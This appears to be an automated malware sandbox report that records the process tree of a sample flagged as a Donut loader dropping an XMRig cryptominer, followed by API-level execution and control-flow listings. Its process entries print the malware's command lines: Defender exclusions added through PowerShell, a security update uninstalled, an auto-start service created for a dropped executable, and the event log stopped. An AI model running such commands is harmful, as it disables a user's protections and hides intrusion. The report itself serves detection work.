                                                    MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:false

                                                    Target ID:4
                                                    Start time:12:15:05
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                    Imagebase:0x7ff6e3d50000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:5
                                                    Start time:12:15:05
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:7
                                                    Start time:12:15:09
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                    Imagebase:0x7ff677ff0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:8
                                                    Start time:12:15:09
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe delete "MXOLIHZI"
                                                    Imagebase:0x7ff78c960000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:9
                                                    Start time:12:15:09
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:10
                                                    Start time:12:15:09
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:11
                                                    Start time:12:15:09
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\wusa.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                    Imagebase:0x7ff6359a0000
                                                    File size:345'088 bytes
                                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:12
                                                    Start time:12:15:09
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe create "MXOLIHZI" binpath= "C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe" start= "auto"
                                                    Imagebase:0x7ff78c960000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:13
                                                    Start time:12:15:09
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    Target ID:14
                                                    Start time:12:15:09
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                    Imagebase:0x7ff78c960000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:15
                                                    Start time:12:15:09
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\sc.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\sc.exe start "MXOLIHZI"
                                                    Imagebase:0x7ff78c960000
                                                    File size:72'192 bytes
                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    Target ID:16
                                                    Start time:12:15:09
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:17
                                                    Start time:12:15:09
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:18
                                                    Start time:12:15:09
                                                    Start date:17/06/2024
                                                    Path:C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe
                                                    Imagebase:0x7ff63b540000
                                                    File size:3'779'584 bytes
                                                    MD5 hash:B99383ADE7723A2376AC12D1FF516AA6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000012.00000002.2251660159.00000122A4359000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000012.00000002.2251423159.00000122A40B0000.00000020.00000001.00020000.00000000.sdmp, Author: unknown
                                                    Antivirus matches:
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 45%, ReversingLabs
                                                    Has exited:true

                                                    Target ID:19
                                                    Start time:12:15:09
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\notepad.exe
                                                    Wow64 process (32bit):
                                                    Commandline:notepad.exe
                                                    Imagebase:
                                                    File size:201'216 bytes
                                                    MD5 hash:27F71B12CB585541885A31BE22F61C83
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:20
                                                    Start time:12:15:10
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                    Imagebase:0x7ff6e3d50000
                                                    File size:452'608 bytes
                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:21
                                                    Start time:12:15:10
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:22
                                                    Start time:12:15:11
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                    Imagebase:0x7ff677ff0000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:23
                                                    Start time:12:15:11
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:false

                                                    Target ID:24
                                                    Start time:12:15:11
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:25
                                                    Start time:12:15:11
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\wusa.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                    Imagebase:0x7ff6359a0000
                                                    File size:345'088 bytes
                                                    MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Target ID:26
                                                    Start time:12:15:11
                                                    Start date:17/06/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:conhost.exe
                                                    Imagebase:0x7ff66e660000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000001A.00000002.3409824385.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                    Has exited:false

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:3%
                                                      Dynamic/Decrypted Code Coverage:44.6%
                                                      Signature Coverage:12.2%
                                                      Total number of Nodes:74
                                                      Total number of Limit Nodes:6
                                                      execution_graph 15062 1bb80981394 15063 1bb809813b8 15062->15063 15064 1bb809813c6 NtEnumerateValueKey 15063->15064 15065 1bb8028a434 VirtualAlloc 15066 1bb8028a450 15065->15066 15074 1bb8028a446 15065->15074 15067 1bb8028a54a LoadLibraryA 15066->15067 15068 1bb8028a583 15066->15068 15066->15074 15067->15066 15069 1bb8028a683 15068->15069 15068->15074 15075 1bb8028d964 LoadLibraryA 15068->15075 15069->15074 15095 1bb8028b9b1 15069->15095 15076 1bb8028d99d 15075->15076 15077 1bb8028a65b 15075->15077 15076->15077 15078 1bb8028d9f3 VirtualProtect 15076->15078 15077->15074 15085 1bb8028db6b LoadLibraryA 15077->15085 15078->15077 15079 1bb8028da1f 15078->15079 15080 1bb8028da38 VirtualProtect 15079->15080 15081 1bb8028da6a 15080->15081 15081->15077 15082 1bb8028daa4 VirtualProtect 15081->15082 15082->15077 15083 1bb8028dacd 15082->15083 15084 1bb8028dae6 VirtualProtect 15083->15084 15084->15077 15086 1bb8028db9a 15085->15086 15087 1bb8028dba4 15085->15087 15086->15069 15087->15086 15088 1bb8028dbfa VirtualProtect 15087->15088 15088->15086 15089 1bb8028dc26 15088->15089 15090 1bb8028dc3f VirtualProtect 15089->15090 15091 1bb8028dc71 15090->15091 15091->15086 15092 1bb8028dcab VirtualProtect 15091->15092 15092->15086 15093 1bb8028dcd4 15092->15093 15094 1bb8028dced VirtualProtect 15093->15094 15094->15086 15096 1bb8028bb39 15095->15096 15097 1bb8028bc08 VirtualAlloc 15096->15097 15098 1bb8028bc4d 15096->15098 15097->15098 15098->15074 15099 7ff72877527c 15102 7ff728775240 15099->15102 15100 7ff728775243 EnumProcessModulesEx 15100->15102 15101 7ff7287752b4 memset 15101->15102 15102->15099 15102->15100 15102->15101 15103 7ff72878d164 15104 7ff72878d17d 15103->15104 15105 7ff72878d185 __scrt_acquire_startup_lock 15104->15105 15106 7ff72878d2bb 15104->15106 15108 7ff72878d2c5 15105->15108 15113 7ff72878d1a3 __scrt_release_startup_lock 15105->15113 15125 7ff72878d6f0 IsProcessorFeaturePresent 15106->15125 15109 7ff72878d6f0 9 API calls 15108->15109 15110 7ff72878d2d0 15109->15110 15112 7ff72878d2d8 _exit 15110->15112 15111 7ff72878d1c8 15113->15111 15114 7ff72878d24e _get_initial_narrow_environment __p___argv __p___argc 15113->15114 15118 7ff72878d246 _register_thread_local_exe_atexit_callback 15113->15118 15115 7ff728773570 15114->15115 15116 7ff72878d270 15115->15116 15123 7ff72878d840 GetModuleHandleW 15116->15123 15118->15114 15120 7ff72878d27b 15121 7ff72878d280 _cexit 15120->15121 15122 7ff72878d285 15120->15122 15121->15122 15122->15111 15124 7ff72878d277 15123->15124 15124->15110 15124->15120 15126 7ff72878d716 15125->15126 15127 7ff72878d724 memset RtlCaptureContext RtlLookupFunctionEntry 15126->15127 15128 7ff72878d79a memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 15127->15128 15129 7ff72878d75e RtlVirtualUnwind 15127->15129 15130 7ff72878d81a 15128->15130 15129->15128 15130->15108 15131 7ff728773470 15134 7ff7287756b0 CloseHandle 15131->15134 15133 7ff728773498 15135 7ff7287756d7 15134->15135 15136 7ff7287756e0 GetLastError 15134->15136 15135->15133 15137 7ff72877573c 15136->15137 15137->15133 15138 7ff728774a10 15139 7ff728774a46 15138->15139 15140 7ff728774a5d CreateFileW 15139->15140 15142 7ff728774aa7 15140->15142 15141 7ff728774b14 15142->15141 15143 7ff728774b58 GetLastError CloseHandle 15142->15143 15143->15141

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2227514021.000001BB80981000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001BB80981000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1bb80981000_file.jbxd
                                                      Similarity
                                                      • API ID: EnumerateValue
                                                      • String ID:
                                                      • API String ID: 1749906896-0
                                                      • Opcode ID: 3e6086999d909772927b4a53b8ab5f9f85d395806cf9dc02ee7e905097e990c9
                                                      • Instruction ID: 0b57603e4f7f899cd7db13a1d4b4412aadf2f684c65edc241f8ec5cf05e4a122
                                                      • Opcode Fuzzy Hash: 3e6086999d909772927b4a53b8ab5f9f85d395806cf9dc02ee7e905097e990c9
                                                      • Instruction Fuzzy Hash: 12F0C970519B058FEB48EF28D89991ABBF1F7A8341F00891EA085D3271DF79D580CB92

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: __p___argc__p___argv__scrt_acquire_startup_lock__scrt_release_startup_lock_cexit_exit_get_initial_narrow_environment_register_thread_local_exe_atexit_callback
                                                      • String ID:
                                                      • API String ID: 1133592946-0
                                                      • Opcode ID: 8f35b274382aea9d74736abc4321152b8662125592f65204fea856f61f15728e
                                                      • Instruction ID: 548359834897ec2aa62586ba0d4bdf0501000e844d1cda358586e88f4974ab29
                                                      • Opcode Fuzzy Hash: 8f35b274382aea9d74736abc4321152b8662125592f65204fea856f61f15728e
                                                      • Instruction Fuzzy Hash: 7F313B21E8820285FA50BBE59C153B9DA51EF8D784FC4003BEA0D473D7DE6FF444AA28

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001BB80000000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1bb80000000_file.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: 3384dbaf04124ae408191e174ba91d228b647bba7aee9aeb13463d67c128df74
                                                      • Instruction ID: a5655b562cc002bc7495784cb05033e285240d1d688a73cbd388ec6f5d5955e0
                                                      • Opcode Fuzzy Hash: 3384dbaf04124ae408191e174ba91d228b647bba7aee9aeb13463d67c128df74
                                                      • Instruction Fuzzy Hash: B551D634B0890E8FEF85EE5CC884BAE73F5FBA8310F504615A419D7694DBB4EA54CB41

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001BB80000000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1bb80000000_file.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad
                                                      • String ID:
                                                      • API String ID: 1029625771-0
                                                      • Opcode ID: f3343c76b6cd9d232af124fb01760c8ff8c6bf56e7b46f00006a0382ca75c8d6
                                                      • Instruction ID: 3cd0cd3ef4f7e34c6d1c9cef8e5e8ececfc9695459e4be5f565582221148f1a7
                                                      • Opcode Fuzzy Hash: f3343c76b6cd9d232af124fb01760c8ff8c6bf56e7b46f00006a0382ca75c8d6
                                                      • Instruction Fuzzy Hash: 1351F634B1C90E8FDF81EE9CC884BAE73F5FBA8310F504625A41AD7694DBB4E9448B41

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 6e9120aa9af772301a4a386b5b1c0067b3c901f9ce423e8083d5da3411376083
                                                      • Instruction ID: 2351752cb17b0db4bea51006334d651da66441b7a1d2668b83385c04a0f77b6a
                                                      • Opcode Fuzzy Hash: 6e9120aa9af772301a4a386b5b1c0067b3c901f9ce423e8083d5da3411376083
                                                      • Instruction Fuzzy Hash: A031D232B04A0185F760ABA4EC447ADE661EB887A8F548235DFAD07BD9DF3ED441C714

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 176 1bb8028a434-1bb8028a444 VirtualAlloc 177 1bb8028a446-1bb8028a44b 176->177 178 1bb8028a450-1bb8028a4fa call 1bb8028dd5f call 1bb8028dd17 call 1bb8028e202 call 1bb8028dee4 176->178 179 1bb8028a811-1bb8028a819 177->179 188 1bb8028a758-1bb8028a759 178->188 189 1bb8028a500-1bb8028a535 call 1bb8028d854 178->189 191 1bb8028a765-1bb8028a772 188->191 196 1bb8028a537-1bb8028a53c 189->196 197 1bb8028a541-1bb8028a548 189->197 193 1bb8028a774-1bb8028a782 191->193 194 1bb8028a7db-1bb8028a80c call 1bb8028dd17 191->194 193->194 198 1bb8028a784-1bb8028a7d1 call 1bb8028dd17 193->198 194->179 196->179 200 1bb8028a574-1bb8028a581 197->200 198->194 203 1bb8028a583-1bb8028a58a 200->203 204 1bb8028a54a-1bb8028a570 LoadLibraryA 200->204 206 1bb8028a5e0-1bb8028a5ed 203->206 204->200 208 1bb8028a58c-1bb8028a5d6 call 1bb8028d854 206->208 209 1bb8028a5ef-1bb8028a5fc 206->209 219 1bb8028a75b-1bb8028a75c 208->219 220 1bb8028a5dc 208->220 210 1bb8028a5fe-1bb8028a60c call 1bb8028a81a 209->210 211 1bb8028a612-1bb8028a61f 209->211 210->211 221 1bb8028a75e-1bb8028a75f 210->221 214 1bb8028a631-1bb8028a63d 211->214 215 1bb8028a621-1bb8028a62f 211->215 218 1bb8028a640-1bb8028a64d 214->218 215->218 222 1bb8028a69f-1bb8028a6a8 218->222 223 1bb8028a64f-1bb8028a662 call 1bb8028d964 218->223 219->191 220->206 221->191 224 1bb8028a6b5-1bb8028a6bc call 1bb8028b9b1 222->224 225 1bb8028a6aa-1bb8028a6b3 222->225 233 1bb8028a664-1bb8028a671 223->233 234 1bb8028a677-1bb8028a67e call 1bb8028db6b 223->234 230 1bb8028a6c1 224->230 225->224 227 1bb8028a6c6-1bb8028a6cf 225->227 231 1bb8028a6dc-1bb8028a6f1 call 1bb8028ad4e 227->231 232 1bb8028a6d1-1bb8028a6da 227->232 230->191 245 1bb8028a6f3-1bb8028a701 call 1bb8028b112 231->245 246 1bb8028a706-1bb8028a719 call 1bb8028b78b 231->246 232->231 235 1bb8028a71b-1bb8028a724 232->235 233->234 237 1bb8028a761-1bb8028a762 233->237 240 1bb8028a683-1bb8028a68a 234->240 241 1bb8028a726-1bb8028a72f 235->241 242 1bb8028a731-1bb8028a73d call 1bb8028c4ce 235->242 237->191 240->222 247 1bb8028a68c-1bb8028a699 240->247 241->242 243 1bb8028a73f-1bb8028a748 241->243 242->191 243->191 249 1bb8028a74a-1bb8028a756 call 1bb8028c2b6 243->249 245->246 246->191 247->222 252 1bb8028a764 247->252 249->191 252->191
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp, Offset: 000001BB80000000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1bb80000000_file.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID:
                                                      • API String ID: 4275171209-0
                                                      • Opcode ID: 92c0ea50874150b054a817daf60ee9fc003736d41b50868d266c4d75121e88d1
                                                      • Instruction ID: 580fab301dbc4eac24727ef9b1f8260c9a726b4ca8096d71c04109c158a0853a
                                                      • Opcode Fuzzy Hash: 92c0ea50874150b054a817daf60ee9fc003736d41b50868d266c4d75121e88d1
                                                      • Instruction Fuzzy Hash: BCE1BC34A1890D8FEF95EB9CC085FAEB7F5FB58340F9441A4E509DB691DBB4E8809B40

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: EnumModulesProcessmemset
                                                      • String ID:
                                                      • API String ID: 2788162479-0
                                                      • Opcode ID: b080baafe9dc283cbf222f303f25dea2ccf790df6adc1ae6ee288a2e3dca6954
                                                      • Instruction ID: 6a4260214a64be8d93e1c0dcc101fcf9253e2a79578dd7bb5324a1ab1385a3ea
                                                      • Opcode Fuzzy Hash: b080baafe9dc283cbf222f303f25dea2ccf790df6adc1ae6ee288a2e3dca6954
                                                      • Instruction Fuzzy Hash: A911C662F1465145EA00EBE1AD052AEE761FB08BA8FD00622DE2D237D5CF39E641E718

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2228207286.00007FF728771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF728770000, based on PE: true
                                                      • Associated: 00000000.00000002.2228160584.00007FF728770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228239553.00007FF728790000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228797821.00007FF728B0B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2228817379.00007FF728B0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff728770000_file.jbxd
                                                      Similarity
                                                      • API ID: CloseErrorHandleLast
                                                      • String ID:
                                                      • API String ID: 918212764-0
                                                      • Opcode ID: ba2161fbdca203ce282a3bad5a3a37409828693ed662d9c325a3d7b7554e52e4
                                                      • Instruction ID: 670e452ff3491a4d2f9ed3aab9290557d4ce2f7f60f71e371398f72990145e71
                                                      • Opcode Fuzzy Hash: ba2161fbdca203ce282a3bad5a3a37409828693ed662d9c325a3d7b7554e52e4
                                                      • Instruction Fuzzy Hash: 4D110D36F50B419CE710ABB0E8453EC77B4F748328F944236CAAC56B98EF399199C754

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
